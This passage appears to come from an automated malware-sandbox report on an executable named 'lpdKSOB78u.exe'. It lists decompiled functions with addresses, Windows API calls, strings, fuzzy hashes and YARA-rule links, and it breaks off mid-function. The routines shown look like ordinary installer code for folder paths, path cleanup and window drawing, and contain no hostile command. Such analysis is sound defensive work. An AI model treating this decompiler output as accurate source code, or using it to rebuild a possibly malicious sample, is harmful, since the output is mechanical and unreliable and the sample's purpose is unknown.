					_t52 =  *0x42f44c;
					__eflags = _t52;
					_t99 = 2;
					if(_t52 >= 0) {
						L13:
						_a8 = 1;
						L14:
						__eflags =  *0x42f4e4;
						if( *0x42f4e4 != 0) {
							_t99 = 4;
						}
						__eflags = _t80;
						if(__eflags >= 0) {
							__eflags = _t80 - 0x25;
							if(_t80 != 0x25) {
								__eflags = _t80 - 0x24;
								if(_t80 == 0x24) {
									GetWindowsDirectoryA(_t90, 0x400);
									_t99 = 0;
								}
								while(1) {
									__eflags = _t99;
									if(_t99 == 0) {
										goto L30;
									}
									_t53 =  *0x42f444;
									_t99 = _t99 - 1;
									__eflags = _t53;
									if(_t53 == 0) {
										L26:
										_t55 = SHGetSpecialFolderLocation( *0x42f448,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
										__eflags = _t55;
										if(_t55 != 0) {
											L28:
											 *_t90 =  *_t90 & 0x00000000;
											__eflags =  *_t90;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v8, _t90);
										_v12 = _t55;
										__imp__CoTaskMemFree(_v8);
										__eflags = _v12;
										if(_v12 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L26;
									}
									_t57 =  *_t53( *0x42f448,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90);
									__eflags = _t57;
									if(_t57 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryA(_t90, 0x400);
							goto L30;
						} else {
							E00406134((_t80 & 0x0000003f) +  *0x42f498, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x42f498, _t90, _t80 & 0x00000040);
							__eflags =  *_t90;
							if( *_t90 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E004062E0(_t66, _t90, _t99, _t90, _v16);
							L30:
							__eflags =  *_t90;
							if( *_t90 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t52 - 0x5a04;
					if(_t52 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_a8 = _a8 & 0x00000000;
						goto L14;
					}
				}
				 *_t90 =  *_t90 & 0x00000000;
				if(_a4 == 0) {
					return _t39;
				}
				return E0040624D(_a4, _t39);
			}

0x004062e0
0x004062e0
0x004062e0
0x004062e6
0x004062eb
0x004062ed
0x004062fc
0x004062fc
0x00406304
0x00406305
0x00406306
0x00406307
0x0040630a
0x00406312
0x00406314
0x0040632b
0x0040632e
0x0040632e
0x00406505
0x00406505
0x00406509
0x00000000
0x00000000
0x0040633b
0x00406341
0x00000000
0x00000000
0x00406347
0x00406348
0x0040634b
0x0040634e
0x004064f8
0x00406502
0x00406504
0x00406504
0x004064fa
0x004064fc
0x004064fe
0x004064ff
0x004064ff
0x00000000
0x004064f8
0x00406354
0x00406358
0x00406368
0x0040636f
0x00406372
0x0040637a
0x0040637d
0x00406384
0x00406385
0x00406388
0x004064a5
0x004064a8
0x004064d8
0x004064db
0x004064e0
0x004064e4
0x004064e4
0x004064e9
0x004064ef
0x004064f1
0x00000000
0x004064f1
0x004064aa
0x004064ad
0x004064c2
0x004064c9
0x004064af
0x004064b6
0x004064b6
0x004064d1
0x004064d4
0x0040649d
0x0040649e
0x0040649e
0x00000000
0x004064d4
0x0040638e
0x00406395
0x00406397
0x00406398
0x004063b2
0x004063b2
0x004063b9
0x004063b9
0x004063c0
0x004063c4
0x004063c4
0x004063c5
0x004063c7
0x00406400
0x00406403
0x00406413
0x00406416
0x0040641e
0x00406424
0x00406424
0x00406483
0x00406483
0x00406485
0x00000000
0x00000000
0x00406428
0x0040642f
0x00406430
0x00406432
0x0040644c
0x0040645a
0x00406460
0x00406462
0x00406480
0x00406480
0x00406480
0x00000000
0x00406480
0x00406468
0x00406471
0x00406474
0x0040647a
0x0040647e
0x00000000
0x00000000
0x00000000
0x0040647e
0x00406434
0x00406437
0x00000000
0x00000000
0x00406446
0x00406448
0x0040644a
0x00000000
0x00000000
0x00000000
0x0040644a
0x00000000
0x00406483
0x0040640b
0x00000000
0x004063c9
0x004063e4
0x004063e9
0x004063ec
0x0040648c
0x0040648c
0x00406490
0x00406498
0x00406498
0x00000000
0x00406490
0x004063f6
0x00406487
0x00406487
0x0040648a
0x00000000
0x00000000
0x00000000
0x0040648a
0x004063c7
0x0040639a
0x0040639e
0x00000000
0x00000000
0x004063a0
0x004063a4
0x00000000
0x00000000
0x004063a6
0x004063aa
0x00000000
0x004063ac
0x004063ac
0x00000000
0x004063ac
0x004063aa
0x0040650f
0x00406519
0x00406525
0x00406525
0x00000000

APIs

GetSystemDirectoryA.KERNEL32 ref: 0040640B
GetWindowsDirectoryA.KERNEL32(Call,00000400,?,0042A098,00000000,004053AC,0042A098,00000000), ref: 0040641E
SHGetSpecialFolderLocation.SHELL32(004053AC,00000000,?,0042A098,00000000,004053AC,0042A098,00000000), ref: 0040645A
SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 00406468
CoTaskMemFree.OLE32(00000000), ref: 00406474
lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406498
lstrlenA.KERNEL32(Call,?,0042A098,00000000,004053AC,0042A098,00000000,00000000,00000000,00000000), ref: 004064EA

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 004063DA
Call, xrefs: 0040630A, 004063D7, 004063D8, 004063D9, 004063F5, 0040640A, 0040641D, 00406439, 00406464, 00406497, 0040649D, 004064B5, 004064C8, 004064E3, 004064E9, 004064F1, 0040651B
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406492

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-1230650788
Opcode ID: 116f694ca47b2294ea13ab99a6c6e8b5a49a04805e258c6f634d98d242d16d5f
Instruction ID: cb9956cf134697f00dd0045f5d81f520e4bdc76bf78ec342c260f9164b19bc27
Opcode Fuzzy Hash: 116f694ca47b2294ea13ab99a6c6e8b5a49a04805e258c6f634d98d242d16d5f
Instruction Fuzzy Hash: 5F611571A00104AEEB219F64DD85BBE3BA4AB15314F56413FE903B62D1D37C89A2CB5E

Uniqueness

Uniqueness Score: -1.00%

Function 704824D8, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E704824D8(intOrPtr* _a4) {
				char _v80;
				int _v84;
				intOrPtr _v88;
				short _v92;
				intOrPtr* _t28;
				void* _t30;
				intOrPtr _t31;
				signed int _t43;
				void* _t44;
				intOrPtr _t45;
				void* _t48;

				_t44 = E70481215();
				_t28 = _a4;
				_t45 =  *((intOrPtr*)(_t28 + 0x814));
				_v88 = _t45;
				_t48 = (_t45 + 0x41 << 5) + _t28;
				do {
					if( *((intOrPtr*)(_t48 - 4)) >= 0) {
					}
					_t43 =  *(_t48 - 8) & 0x000000ff;
					if(_t43 <= 7) {
						switch( *((intOrPtr*)(_t43 * 4 +  &M70482626))) {
							case 0:
								 *_t44 = 0;
								goto L17;
							case 1:
								__eax =  *__eax;
								if(__ecx > __ebx) {
									_v84 = __ecx;
									__ecx =  *(0x7048307c + __edx * 4);
									__edx = _v84;
									__ecx = __ecx * __edx;
									asm("sbb edx, edx");
									__edx = __edx & __ecx;
									__eax = __eax &  *(0x7048309c + __edx * 4);
								}
								_push(__eax);
								goto L15;
							case 2:
								__eax = E70481429(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L16;
							case 3:
								__eax = lstrcpynA(__edi,  *__eax,  *0x7048405c);
								goto L17;
							case 4:
								__ecx =  *0x7048405c;
								__edx = __ecx - 1;
								__eax = WideCharToMultiByte(__ebx, __ebx,  *__eax, __ecx, __edi, __edx, __ebx, __ebx);
								__eax =  *0x7048405c;
								 *((char*)(__eax + __edi - 1)) = __bl;
								goto L17;
							case 5:
								__ecx =  &_v80;
								_push(0x27);
								_push(__ecx);
								_push( *__eax);
								__imp__StringFromGUID2();
								__eax =  &_v92;
								__eax = WideCharToMultiByte(__ebx, __ebx,  &_v92,  &_v92, __edi,  *0x7048405c, __ebx, __ebx);
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfA(__edi, 0x70484000);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					_t30 =  *(_t48 + 0x14);
					if(_t30 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t48 - 4)) > 0)) {
						GlobalFree(_t30);
					}
					_t31 =  *((intOrPtr*)(_t48 + 0xc));
					if(_t31 != 0) {
						if(_t31 != 0xffffffff) {
							if(_t31 > 0) {
								E704812D1(_t31 - 1, _t44);
								goto L26;
							}
						} else {
							E70481266(_t44);
							L26:
						}
					}
					_v88 = _v88 - 1;
					_t48 = _t48 - 0x20;
				} while (_v88 >= 0);
				return GlobalFree(_t44);
			}

0x704824e4
0x704824e6
0x704824f0
0x704824f6
0x70482500
0x70482504
0x70482509
0x70482509
0x70482511
0x70482518
0x7048251e
0x00000000
0x70482525
0x00000000
0x00000000
0x7048252c
0x70482530
0x70482533
0x70482537
0x7048253e
0x70482542
0x70482548
0x7048254a
0x7048254c
0x7048254c
0x70482553
0x00000000
0x00000000
0x7048255c
0x00000000
0x00000000
0x7048256c
0x00000000
0x00000000
0x70482598
0x704825a0
0x704825aa
0x704825ac
0x704825b1
0x00000000
0x00000000
0x70482574
0x70482578
0x7048257a
0x7048257b
0x7048257d
0x7048258d
0x70482594
0x00000000
0x00000000
0x704825b7
0x704825b9
0x704825bf
0x704825c5
0x704825c5
0x00000000
0x00000000
0x7048251e
0x704825c8
0x704825c8
0x704825cd
0x704825de
0x704825de
0x704825e4
0x704825e9
0x704825ee
0x704825fa
0x704825ff
0x00000000
0x70482604
0x704825f0
0x704825f1
0x70482605
0x70482605
0x704825ee
0x70482606
0x7048260a
0x7048260d
0x70482625

APIs

Part of subcall function 70481215: GlobalAlloc.KERNEL32(00000040,70481233,?,704812CF,-7048404B,704811AB,-000000A0), ref: 7048121D

GlobalFree.KERNEL32 ref: 704825DE
GlobalFree.KERNEL32 ref: 70482618

Strings

{t@ut, xrefs: 7048257D

Memory Dump Source

Source File: 00000000.00000002.213483594.0000000070481000.00000020.00020000.sdmp, Offset: 70480000, based on PE: true

Associated: 00000000.00000002.213476460.0000000070480000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.213490804.0000000070483000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.213497394.0000000070485000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$Free$Alloc
String ID: {t@ut
API String ID: 1780285237-3262140062
Opcode ID: aafe1e2342d08fc9ca852de4a70fec6c6ed9cb253725dc4ce6a65bbe95d65ca6
Instruction ID: 3ad4a477f990299fda884f16cb335541930da027154368ebc2136a3a5a51544e
Opcode Fuzzy Hash: aafe1e2342d08fc9ca852de4a70fec6c6ed9cb253725dc4ce6a65bbe95d65ca6
Instruction Fuzzy Hash: E641AE72544200EFD3029F54CE94D2F77BEEB86209B204D6DF642A72E4D739A905DB62

Uniqueness

Uniqueness Score: -1.00%

Function 704822F1, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E704822F1(void* __edx, intOrPtr _a4) {
				signed int _v4;
				signed int _v8;
				void* _t38;
				signed int _t39;
				void* _t40;
				void* _t43;
				void* _t48;
				signed int* _t50;
				signed char* _t51;

				_v8 = 0 |  *((intOrPtr*)(_a4 + 0x814)) > 0x00000000;
				while(1) {
					_t9 = _a4 + 0x818; // 0x818
					_t51 = (_v8 << 5) + _t9;
					_t38 = _t51[0x18];
					if(_t38 == 0) {
						goto L9;
					}
					_t48 = 0x1a;
					if(_t38 == _t48) {
						goto L9;
					}
					if(_t38 != 0xffffffff) {
						if(_t38 <= 0 || _t38 > 0x19) {
							_t51[0x18] = _t48;
						} else {
							_t38 = E704812AD(_t38 - 1);
							L10:
						}
						goto L11;
					} else {
						_t38 = E7048123B();
						L11:
						_t43 = _t38;
						_t13 =  &(_t51[8]); // 0x820
						_t50 = _t13;
						if(_t51[4] >= 0) {
						}
						_t39 =  *_t51 & 0x000000ff;
						_t51[0x1c] = _t51[0x1c] & 0x00000000;
						_v4 = _t39;
						if(_t39 > 7) {
							L27:
							_t40 = GlobalFree(_t43);
							if(_v8 == 0) {
								return _t40;
							}
							if(_v8 !=  *((intOrPtr*)(_a4 + 0x814))) {
								_v8 = _v8 + 1;
							} else {
								_v8 = _v8 & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t39 * 4 +  &M7048247E))) {
								case 0:
									 *_t50 =  *_t50 & 0x00000000;
									goto L27;
								case 1:
									__eax = E704812FE(__ebx);
									goto L20;
								case 2:
									 *__ebp = E704812FE(__ebx);
									_a4 = __edx;
									goto L27;
								case 3:
									__eax = E70481224(__ebx);
									 *(__esi + 0x1c) = __eax;
									L20:
									 *__ebp = __eax;
									goto L27;
								case 4:
									 *0x7048405c =  *0x7048405c +  *0x7048405c;
									__edi = GlobalAlloc(0x40,  *0x7048405c +  *0x7048405c);
									 *0x7048405c = MultiByteToWideChar(0, 0, __ebx,  *0x7048405c, __edi,  *0x7048405c);
									if(_v4 != 5) {
										 *(__esi + 0x1c) = __edi;
										 *__ebp = __edi;
									} else {
										__eax = GlobalAlloc(0x40, 0x10);
										_push(__eax);
										 *(__esi + 0x1c) = __eax;
										_push(__edi);
										 *__ebp = __eax;
										__imp__CLSIDFromString();
										__eax = GlobalFree(__edi);
									}
									goto L27;
								case 5:
									if( *__ebx != 0) {
										__eax = E704812FE(__ebx);
										 *__edi = __eax;
									}
									goto L27;
								case 6:
									__esi =  *(__esi + 0x18);
									__esi = __esi - 1;
									__esi = __esi *  *0x7048405c;
									__esi = __esi +  *0x70484064;
									__eax = __esi + 0xc;
									 *__edi = __esi + 0xc;
									asm("cdq");
									__eax = E70481429(__edx, __esi + 0xc, __edx, __esi);
									goto L27;
							}
						}
					}
					L9:
					_t38 = E70481224(0x70484034);
					goto L10;
				}
			}

0x70482306
0x7048230a
0x70482315
0x70482315
0x7048231c
0x70482321
0x00000000
0x00000000
0x70482325
0x70482328
0x00000000
0x00000000
0x7048232d
0x70482338
0x70482348
0x7048233f
0x70482341
0x70482357
0x70482357
0x00000000
0x7048232f
0x7048232f
0x70482358
0x7048235c
0x7048235e
0x7048235e
0x70482361
0x70482361
0x70482369
0x7048236c
0x70482373
0x70482377
0x70482446
0x70482447
0x70482452
0x7048247d
0x7048247d
0x70482462
0x7048246e
0x70482464
0x70482464
0x70482464
0x00000000
0x7048237d
0x7048237d
0x00000000
0x70482384
0x00000000
0x00000000
0x7048238d
0x00000000
0x00000000
0x7048239b
0x7048239e
0x00000000
0x00000000
0x704823a7
0x704823ac
0x704823af
0x704823b0
0x00000000
0x00000000
0x704823bd
0x704823c8
0x704823d7
0x704823e2
0x70482405
0x70482408
0x704823e4
0x704823e8
0x704823ee
0x704823ef
0x704823f2
0x704823f3
0x704823f6
0x704823fd
0x704823fd
0x00000000
0x00000000
0x70482410
0x70482413
0x7048241f
0x70482421
0x00000000
0x00000000
0x70482424
0x70482427
0x70482428
0x7048242f
0x70482436
0x70482439
0x7048243b
0x7048243e
0x00000000
0x00000000
0x7048237d
0x70482377
0x7048234d
0x70482352
0x00000000
0x70482352

APIs

GlobalFree.KERNEL32 ref: 70482447

Part of subcall function 70481224: lstrcpynA.KERNEL32(00000000,?,704812CF,-7048404B,704811AB,-000000A0), ref: 70481234

GlobalAlloc.KERNEL32(00000040,?), ref: 704823C2
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 704823D7
GlobalAlloc.KERNEL32(00000040,00000010), ref: 704823E8
CLSIDFromString.OLE32(00000000,00000000), ref: 704823F6
GlobalFree.KERNEL32 ref: 704823FD

Strings

@ut, xrefs: 704823F6

Memory Dump Source

Source File: 00000000.00000002.213483594.0000000070481000.00000020.00020000.sdmp, Offset: 70480000, based on PE: true

Associated: 00000000.00000002.213476460.0000000070480000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.213490804.0000000070483000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.213497394.0000000070485000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
String ID: @ut
API String ID: 3730416702-3384101347
Opcode ID: 88a8c6634993cce5dc0ac77f39786fc3f496395da7a7eec9109460594d74e2ea
Instruction ID: b376625025f8bc216ed30f1390814d8b2a9bed52721c67853ca001267eb9b6c9
Opcode Fuzzy Hash: 88a8c6634993cce5dc0ac77f39786fc3f496395da7a7eec9109460594d74e2ea
Instruction Fuzzy Hash: BC4185B2508701EFD3119F64CA44B2EB7FCFB40715F204C2EF9469A2E0D738A9458B62

Uniqueness

Uniqueness Score: -1.00%

Function 00406528, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406528(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405C52(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405C10("*?|<>/\":", _t5))) == 0) {
							E00405DA1(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x0040652a
0x00406532
0x00406546
0x00406546
0x0040654c
0x00406559
0x00406559
0x0040655a
0x0040655c
0x00406560
0x00406562
0x0040656b
0x0040656d
0x00406587
0x0040658f
0x0040658f
0x00406594
0x00406596
0x00406598
0x0040659c
0x0040659d
0x004065a0
0x004065a8
0x004065aa
0x004065ae
0x00000000
0x00000000
0x004065b4
0x004065b9
0x00000000
0x00000000
0x00000000
0x004065b9
0x004065be

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\lpdKSOB78u.exe" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406580
CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040658D
CharNextA.USER32(?,"C:\Users\user\Desktop\lpdKSOB78u.exe" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406592
CharPrevA.USER32(?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 004065A2

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00406529
"C:\Users\user\Desktop\lpdKSOB78u.exe" , xrefs: 00406564
*?|<>/":, xrefs: 00406570

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\lpdKSOB78u.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-2201545603
Opcode ID: 6624216dd93989c3e415f19addad0263e6dff954d131d517deda7fd7c47402c7
Instruction ID: 84dc9c54e44743018b56ada6ed00289937fbd1a3950c851798eb23a5f2cb525a
Opcode Fuzzy Hash: 6624216dd93989c3e415f19addad0263e6dff954d131d517deda7fd7c47402c7
Instruction Fuzzy Hash: CA1108514047A13AFB3216286C45B777F894F97754F1904BFE8C6722C6C67C5CA2827D

Uniqueness

Uniqueness Score: -1.00%

Function 00404338, Relevance: 12.1, APIs: 8, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404338(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}

0x0040434a
0x00404400
0x00000000
0x00404400
0x0040435b
0x0040435f
0x00000000
0x00404379
0x00404379
0x00404382
0x00000000
0x00000000
0x00404384
0x00404390
0x00404393
0x00404393
0x00404399
0x0040439f
0x0040439f
0x004043ab
0x004043b1
0x004043b8
0x004043bb
0x004043be
0x004043c0
0x004043c0
0x004043c8
0x004043ce
0x004043ce
0x004043d8
0x004043dd
0x004043e0
0x004043e5
0x004043e8
0x004043e8
0x004043f8
0x004043f8
0x00000000
0x004043fb

APIs

GetWindowLongA.USER32 ref: 00404355
GetSysColor.USER32(00000000), ref: 00404393
SetTextColor.GDI32(?,00000000), ref: 0040439F
SetBkMode.GDI32(?,?), ref: 004043AB
GetSysColor.USER32(?), ref: 004043BE
SetBkColor.GDI32(?,?), ref: 004043CE
DeleteObject.GDI32(?), ref: 004043E8
CreateBrushIndirect.GDI32(?), ref: 004043F2

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
Instruction ID: 4e7267cb447ae131ba3d4846a02e3cb7cb8ad683d93e4e28d2f19cfe4ef5bf63
Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
Instruction Fuzzy Hash: A02174B15007049FCB319F78ED48B5BBBF8AF41714B04892EED96A26E1D738E914CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00405374, Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405374(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42ec24; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x42f514;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E004062E0(0, _t39, 0x42a098, 0x42a098, _a4);
					}
					_t26 = lstrlenA(0x42a098);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x42ec08, 0x42a098);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x42a098;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x42a098)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x42a098, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

0x0040537a
0x00405386
0x00405389
0x0040538f
0x0040539b
0x0040539e
0x004053a1
0x004053a7
0x004053a7
0x004053ad
0x004053b5
0x004053b8
0x004053d5
0x004053d9
0x004053e2
0x004053e2
0x004053ec
0x004053f5
0x00405401
0x00405408
0x0040540c
0x0040540f
0x00405422
0x00405430
0x00405430
0x00405434
0x00405436
0x00405439
0x00000000
0x00405439
0x004053ba
0x004053c2
0x004053ca
0x004053d0
0x00000000
0x004053d0
0x004053ca
0x004053b8
0x00405443

APIs

lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405408
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405422
SendMessageA.USER32(?,00001013,?,00000000), ref: 00405430

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 78efb24cfc6d426cc3f30feafde338b5d49fd2ff0c030ae89829439aee15dea2
Instruction ID: d7eb592bfa4ea3045ae5f44a809824ecf19421b2f71a9c0c58d32ef0e79f5504
Opcode Fuzzy Hash: 78efb24cfc6d426cc3f30feafde338b5d49fd2ff0c030ae89829439aee15dea2
Instruction Fuzzy Hash: 0421AC71D00118BFCB11AFA5DD80ADEBFA9EF05354F50807AF904B22A0C7788E958B68

Uniqueness

Uniqueness Score: -1.00%

Function 00402E52, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402E52(intOrPtr _a4) {
